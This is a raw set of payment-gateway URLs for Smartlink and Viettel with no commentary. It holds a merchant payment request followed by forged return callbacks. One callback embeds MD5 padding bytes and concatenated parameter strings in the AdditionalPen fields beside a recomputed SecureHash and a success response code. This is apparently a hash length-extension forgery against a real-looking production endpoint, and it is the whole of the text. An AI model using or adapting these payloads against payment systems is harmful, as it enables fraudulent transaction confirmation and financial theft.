https://payment.smartlink.com.vn/vpcpay.do
?vpc_AccessCode=V1E2T3T4E5L6
&vpc_Version=1.1
&vpc_Command=pay
&vpc_OrderInfo=0977966393
&vpc_Locale=vn
&vpc_Merchant=VIETTEL
&vpc_TicketNo=10.58.62.170
&vpc_Amount=10000000
&vpc_SecureHash=8C0F20AE21B4C7A13D7F6DCEBD5D6AF8
&vpc_ReturnURL=https://pay.viettel.vn/Receiver!onSmartlink.do
&vpc_Currency=VND
&vpc_MerchTxnRef=150910154440266

https://pay.viettel.vn/Receiver!onSmartlink.do
?vpc_AcqResponseCode=
&vpc_AdditionalData=V1E2T3T4E5L610000000
&vpc_AdditionalPen1=payVNDvn150910154440266VIETTEL
&vpc_AdditionalPen2=0977966393https://pay.viettel.vn/Receiver!onSmartlink.do10.58.62.1701.1
&vpc_AdditionalPen3=%80%00%00%00%00%00%00%00%00%00%00
&vpc_AdditionalPen4=%00%00%00%00%00%00%00%00%00%00%00
&vpc_AdditionalPen5=%00%00%00%00%00%00%00%00%00%C8%04%00%00%00%00%00%00
&vpc_Amount=10000000
&vpc_BatchNo=
&vpc_CardType=
&vpc_Command=pay
&vpc_CurrencyCode=VND
&vpc_Locale=vn
&vpc_Message=
&vpc_MerchTxnRef=150910154440266
&vpc_Merchant=VIETTEL
&vpc_OrderInfo=0977966393
&vpc_ResponseCode=0
&vpc_TransactionNo=3434132324314
&vpc_Version=1.1
&vpc_SecureHash=71921A9CA6D4F4A93DDA9FA00E96961C





\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc8\x04\x00\x00\x00\x00\x00\x00

https://pay.viettel.vn/Receiver!onSmartlink.do
?vpc_AcqResponseCode=
&vpc_AdditionalData=V1E2T3T4E5L6
&vpc_Amount=5000000
&vpc_BatchNo=
&vpc_CardType=
&vpc_Command=pay
&vpc_CurrencyCode=VND
&vpc_Locale=vn
&vpc_Message=
&vpc_MerchTxnRef=150910150514240
&vpc_Merchant=VIETTEL
&vpc_OrderInfo=
&vpc_ResponseCode=0
&vpc_TransactionAnoun=977966393https%3A%2F%2Fpay.viettel.vn%2FReceiver%21onSmartlink.do10.58.62.170
&vpc_TransactionNo=
&vpc_Version=1.1
&vpc_SecureHash=FA1104647E03695BC3AA998E92D3E11E
